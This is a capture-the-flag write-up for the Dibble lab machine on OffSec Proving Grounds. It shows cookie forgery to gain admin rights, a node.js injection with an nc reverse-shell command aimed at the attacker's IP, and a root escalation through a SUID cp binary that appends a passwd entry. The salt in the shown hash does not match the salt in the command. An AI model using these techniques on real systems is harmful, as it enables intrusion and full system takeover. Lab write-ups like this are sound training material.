Dibble
Writeup for Dibble from offsec Proving Grounds
Information Gathering
sudo nmapAutomator.sh 192.168.204.110 all
Service Enumeration
MongoDB (Port 27017)
Authentication is not needed to connect to MongoDB.
Nothing significant was found.
FTP (Port 21)
FTP was unresponsive even though anonymous login was allowed
HTTP (Port 80)
Simple Webpage, checked out directories listed in the robots.txt file found during earlier enumeration.
Tried creating an account but it didn't seem to give more access.
HTTP (Port 3000)
We register an account as test:test.
There was a view event logs tab.
Tried registering a new event, but it seems like we need to be an admin to update event logs.
There is a high chance the website checks which user we are using cookies.
We can check to see if there are any existing cookies.
The userLevel cookie seems to be URL encoded so after decoding it online, we get a base64 string.
ZGVmYXVsdA%3D%3D -> ZGVmYXVsdA==
We can decode the base64 string and we get default.
We can try encoding the admin string using base64 to see if this will let us post new events.
We use the -n flag as echo by defaults adds a newline character at the end of the string which we do not want to encode.
After updating the cookie value, we are able to post new events.
Exploit
Tested by supplying a simple math operation to see if it would evaluate.
From our earlier enumeration, we know that this is running node.js, so maybe we can inject some node.js code.
Tried the first command to try to get a reverse shell but it didn't work.
require('child_process').exec('nc -e cmd 192.168.49.204 80')
Turns out it got evaluated to [object Object].
We try another payload and this time it works.
Privesc
Running linpeas, we see that cp has SUID bit set.
We can follow this guy on how to escalate privileges with cp command.
openssl passwd -1 -salt ignite bob
echo bob:$1$-itnite$VRvGqpGVibx/r9NPdLLTF1:0:0:root:/root:/bin/bash >> passwd
Last updated
